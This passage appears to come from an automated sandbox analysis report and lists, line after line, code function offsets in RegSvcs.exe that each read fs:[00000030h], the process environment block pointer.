Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2750 mov eax, dword ptr fs:[00000030h]	5_2_019D2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C674D mov esi, dword ptr fs:[00000030h]	5_2_019C674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C674D mov eax, dword ptr fs:[00000030h]	5_2_019C674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C674D mov eax, dword ptr fs:[00000030h]	5_2_019C674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01998770 mov eax, dword ptr fs:[00000030h]	5_2_01998770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0770 mov eax, dword ptr fs:[00000030h]	5_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0770 mov eax, dword ptr fs:[00000030h]	5_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0770 mov eax, dword ptr fs:[00000030h]	5_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0770 mov eax, dword ptr fs:[00000030h]	5_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0770 mov eax, dword ptr fs:[00000030h]	5_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0770 mov eax, dword ptr fs:[00000030h]	5_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0770 mov eax, dword ptr fs:[00000030h]	5_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0770 mov eax, dword ptr fs:[00000030h]	5_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0770 mov eax, dword ptr fs:[00000030h]	5_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0770 mov eax, dword ptr fs:[00000030h]	5_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0770 mov eax, dword ptr fs:[00000030h]	5_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0770 mov eax, dword ptr fs:[00000030h]	5_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A14755 mov eax, dword ptr fs:[00000030h]	5_2_01A14755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A1E75D mov eax, dword ptr fs:[00000030h]	5_2_01A1E75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01994690 mov eax, dword ptr fs:[00000030h]	5_2_01994690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01994690 mov eax, dword ptr fs:[00000030h]	5_2_01994690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C66B0 mov eax, dword ptr fs:[00000030h]	5_2_019C66B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CC6A6 mov eax, dword ptr fs:[00000030h]	5_2_019CC6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A106F1 mov eax, dword ptr fs:[00000030h]	5_2_01A106F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A106F1 mov eax, dword ptr fs:[00000030h]	5_2_01A106F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A0E6F2 mov eax, dword ptr fs:[00000030h]	5_2_01A0E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A0E6F2 mov eax, dword ptr fs:[00000030h]	5_2_01A0E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A0E6F2 mov eax, dword ptr fs:[00000030h]	5_2_01A0E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A0E6F2 mov eax, dword ptr fs:[00000030h]	5_2_01A0E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CA6C7 mov ebx, dword ptr fs:[00000030h]	5_2_019CA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CA6C7 mov eax, dword ptr fs:[00000030h]	5_2_019CA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2619 mov eax, dword ptr fs:[00000030h]	5_2_019D2619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A260B mov eax, dword ptr fs:[00000030h]	5_2_019A260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A260B mov eax, dword ptr fs:[00000030h]	5_2_019A260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A260B mov eax, dword ptr fs:[00000030h]	5_2_019A260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A260B mov eax, dword ptr fs:[00000030h]	5_2_019A260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A260B mov eax, dword ptr fs:[00000030h]	5_2_019A260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A260B mov eax, dword ptr fs:[00000030h]	5_2_019A260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A260B mov eax, dword ptr fs:[00000030h]	5_2_019A260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A0E609 mov eax, dword ptr fs:[00000030h]	5_2_01A0E609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199262C mov eax, dword ptr fs:[00000030h]	5_2_0199262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C6620 mov eax, dword ptr fs:[00000030h]	5_2_019C6620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C8620 mov eax, dword ptr fs:[00000030h]	5_2_019C8620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019AE627 mov eax, dword ptr fs:[00000030h]	5_2_019AE627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A5866E mov eax, dword ptr fs:[00000030h]	5_2_01A5866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A5866E mov eax, dword ptr fs:[00000030h]	5_2_01A5866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019AC640 mov eax, dword ptr fs:[00000030h]	5_2_019AC640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C2674 mov eax, dword ptr fs:[00000030h]	5_2_019C2674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CA660 mov eax, dword ptr fs:[00000030h]	5_2_019CA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CA660 mov eax, dword ptr fs:[00000030h]	5_2_019CA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A189B3 mov esi, dword ptr fs:[00000030h]	5_2_01A189B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A189B3 mov eax, dword ptr fs:[00000030h]	5_2_01A189B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A189B3 mov eax, dword ptr fs:[00000030h]	5_2_01A189B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019909AD mov eax, dword ptr fs:[00000030h]	5_2_019909AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019909AD mov eax, dword ptr fs:[00000030h]	5_2_019909AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A29A0 mov eax, dword ptr fs:[00000030h]	5_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A29A0 mov eax, dword ptr fs:[00000030h]	5_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A29A0 mov eax, dword ptr fs:[00000030h]	5_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A29A0 mov eax, dword ptr fs:[00000030h]	5_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A29A0 mov eax, dword ptr fs:[00000030h]	5_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A29A0 mov eax, dword ptr fs:[00000030h]	5_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A29A0 mov eax, dword ptr fs:[00000030h]	5_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A29A0 mov eax, dword ptr fs:[00000030h]	5_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A29A0 mov eax, dword ptr fs:[00000030h]	5_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A29A0 mov eax, dword ptr fs:[00000030h]	5_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A29A0 mov eax, dword ptr fs:[00000030h]	5_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A29A0 mov eax, dword ptr fs:[00000030h]	5_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A29A0 mov eax, dword ptr fs:[00000030h]	5_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A1E9E0 mov eax, dword ptr fs:[00000030h]	5_2_01A1E9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199A9D0 mov eax, dword ptr fs:[00000030h]	5_2_0199A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199A9D0 mov eax, dword ptr fs:[00000030h]	5_2_0199A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199A9D0 mov eax, dword ptr fs:[00000030h]	5_2_0199A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199A9D0 mov eax, dword ptr fs:[00000030h]	5_2_0199A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199A9D0 mov eax, dword ptr fs:[00000030h]	5_2_0199A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199A9D0 mov eax, dword ptr fs:[00000030h]	5_2_0199A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C49D0 mov eax, dword ptr fs:[00000030h]	5_2_019C49D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A269C0 mov eax, dword ptr fs:[00000030h]	5_2_01A269C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C29F9 mov eax, dword ptr fs:[00000030h]	5_2_019C29F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C29F9 mov eax, dword ptr fs:[00000030h]	5_2_019C29F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A5A9D3 mov eax, dword ptr fs:[00000030h]	5_2_01A5A9D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01988918 mov eax, dword ptr fs:[00000030h]	5_2_01988918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01988918 mov eax, dword ptr fs:[00000030h]	5_2_01988918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A2892B mov eax, dword ptr fs:[00000030h]	5_2_01A2892B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A1892A mov eax, dword ptr fs:[00000030h]	5_2_01A1892A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A0E908 mov eax, dword ptr fs:[00000030h]	5_2_01A0E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A0E908 mov eax, dword ptr fs:[00000030h]	5_2_01A0E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A1C912 mov eax, dword ptr fs:[00000030h]	5_2_01A1C912
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A34978 mov eax, dword ptr fs:[00000030h]	5_2_01A34978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A34978 mov eax, dword ptr fs:[00000030h]	5_2_01A34978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A1C97C mov eax, dword ptr fs:[00000030h]	5_2_01A1C97C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A64940 mov eax, dword ptr fs:[00000030h]	5_2_01A64940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A10946 mov eax, dword ptr fs:[00000030h]	5_2_01A10946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D096E mov eax, dword ptr fs:[00000030h]	5_2_019D096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D096E mov edx, dword ptr fs:[00000030h]	5_2_019D096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D096E mov eax, dword ptr fs:[00000030h]	5_2_019D096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B6962 mov eax, dword ptr fs:[00000030h]	5_2_019B6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B6962 mov eax, dword ptr fs:[00000030h]	5_2_019B6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B6962 mov eax, dword ptr fs:[00000030h]	5_2_019B6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01990887 mov eax, dword ptr fs:[00000030h]	5_2_01990887
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A1C89D mov eax, dword ptr fs:[00000030h]	5_2_01A1C89D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A5A8E4 mov eax, dword ptr fs:[00000030h]	5_2_01A5A8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BE8C0 mov eax, dword ptr fs:[00000030h]	5_2_019BE8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CC8F9 mov eax, dword ptr fs:[00000030h]	5_2_019CC8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CC8F9 mov eax, dword ptr fs:[00000030h]	5_2_019CC8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A608C0 mov eax, dword ptr fs:[00000030h]	5_2_01A608C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3483A mov eax, dword ptr fs:[00000030h]	5_2_01A3483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3483A mov eax, dword ptr fs:[00000030h]	5_2_01A3483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CA830 mov eax, dword ptr fs:[00000030h]	5_2_019CA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B2835 mov eax, dword ptr fs:[00000030h]	5_2_019B2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B2835 mov eax, dword ptr fs:[00000030h]	5_2_019B2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B2835 mov eax, dword ptr fs:[00000030h]	5_2_019B2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B2835 mov ecx, dword ptr fs:[00000030h]	5_2_019B2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B2835 mov eax, dword ptr fs:[00000030h]	5_2_019B2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B2835 mov eax, dword ptr fs:[00000030h]	5_2_019B2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A1C810 mov eax, dword ptr fs:[00000030h]	5_2_01A1C810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01994859 mov eax, dword ptr fs:[00000030h]	5_2_01994859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01994859 mov eax, dword ptr fs:[00000030h]	5_2_01994859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C0854 mov eax, dword ptr fs:[00000030h]	5_2_019C0854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A26870 mov eax, dword ptr fs:[00000030h]	5_2_01A26870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A26870 mov eax, dword ptr fs:[00000030h]	5_2_01A26870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A1E872 mov eax, dword ptr fs:[00000030h]	5_2_01A1E872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A1E872 mov eax, dword ptr fs:[00000030h]	5_2_01A1E872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A2840 mov ecx, dword ptr fs:[00000030h]	5_2_019A2840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A44BB0 mov eax, dword ptr fs:[00000030h]	5_2_01A44BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A44BB0 mov eax, dword ptr fs:[00000030h]	5_2_01A44BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0BBE mov eax, dword ptr fs:[00000030h]	5_2_019A0BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0BBE mov eax, dword ptr fs:[00000030h]	5_2_019A0BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B0BCB mov eax, dword ptr fs:[00000030h]	5_2_019B0BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B0BCB mov eax, dword ptr fs:[00000030h]	5_2_019B0BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B0BCB mov eax, dword ptr fs:[00000030h]	5_2_019B0BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A1CBF0 mov eax, dword ptr fs:[00000030h]	5_2_01A1CBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01990BCD mov eax, dword ptr fs:[00000030h]	5_2_01990BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01990BCD mov eax, dword ptr fs:[00000030h]	5_2_01990BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01990BCD mov eax, dword ptr fs:[00000030h]	5_2_01990BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BEBFC mov eax, dword ptr fs:[00000030h]	5_2_019BEBFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01998BF0 mov eax, dword ptr fs:[00000030h]	5_2_01998BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01998BF0 mov eax, dword ptr fs:[00000030h]	5_2_01998BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01998BF0 mov eax, dword ptr fs:[00000030h]	5_2_01998BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3EBD0 mov eax, dword ptr fs:[00000030h]	5_2_01A3EBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A58B28 mov eax, dword ptr fs:[00000030h]	5_2_01A58B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A58B28 mov eax, dword ptr fs:[00000030h]	5_2_01A58B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A64B00 mov eax, dword ptr fs:[00000030h]	5_2_01A64B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BEB20 mov eax, dword ptr fs:[00000030h]	5_2_019BEB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BEB20 mov eax, dword ptr fs:[00000030h]	5_2_019BEB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A0EB1D mov eax, dword ptr fs:[00000030h]	5_2_01A0EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A0EB1D mov eax, dword ptr fs:[00000030h]	5_2_01A0EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A0EB1D mov eax, dword ptr fs:[00000030h]	5_2_01A0EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A0EB1D mov eax, dword ptr fs:[00000030h]	5_2_01A0EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A0EB1D mov eax, dword ptr fs:[00000030h]	5_2_01A0EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A0EB1D mov eax, dword ptr fs:[00000030h]	5_2_01A0EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A0EB1D mov eax, dword ptr fs:[00000030h]	5_2_01A0EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A0EB1D mov eax, dword ptr fs:[00000030h]	5_2_01A0EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A0EB1D mov eax, dword ptr fs:[00000030h]	5_2_01A0EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01988B50 mov eax, dword ptr fs:[00000030h]	5_2_01988B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A38B42 mov eax, dword ptr fs:[00000030h]	5_2_01A38B42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A26B40 mov eax, dword ptr fs:[00000030h]	5_2_01A26B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A26B40 mov eax, dword ptr fs:[00000030h]	5_2_01A26B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A5AB40 mov eax, dword ptr fs:[00000030h]	5_2_01A5AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0198CB7E mov eax, dword ptr fs:[00000030h]	5_2_0198CB7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A44B4B mov eax, dword ptr fs:[00000030h]	5_2_01A44B4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A44B4B mov eax, dword ptr fs:[00000030h]	5_2_01A44B4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A62B57 mov eax, dword ptr fs:[00000030h]	5_2_01A62B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A62B57 mov eax, dword ptr fs:[00000030h]	5_2_01A62B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A62B57 mov eax, dword ptr fs:[00000030h]	5_2_01A62B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A62B57 mov eax, dword ptr fs:[00000030h]	5_2_01A62B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3EB50 mov eax, dword ptr fs:[00000030h]	5_2_01A3EB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C8A90 mov edx, dword ptr fs:[00000030h]	5_2_019C8A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199EA80 mov eax, dword ptr fs:[00000030h]	5_2_0199EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199EA80 mov eax, dword ptr fs:[00000030h]	5_2_0199EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199EA80 mov eax, dword ptr fs:[00000030h]	5_2_0199EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199EA80 mov eax, dword ptr fs:[00000030h]	5_2_0199EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199EA80 mov eax, dword ptr fs:[00000030h]	5_2_0199EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199EA80 mov eax, dword ptr fs:[00000030h]	5_2_0199EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199EA80 mov eax, dword ptr fs:[00000030h]	5_2_0199EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199EA80 mov eax, dword ptr fs:[00000030h]	5_2_0199EA80
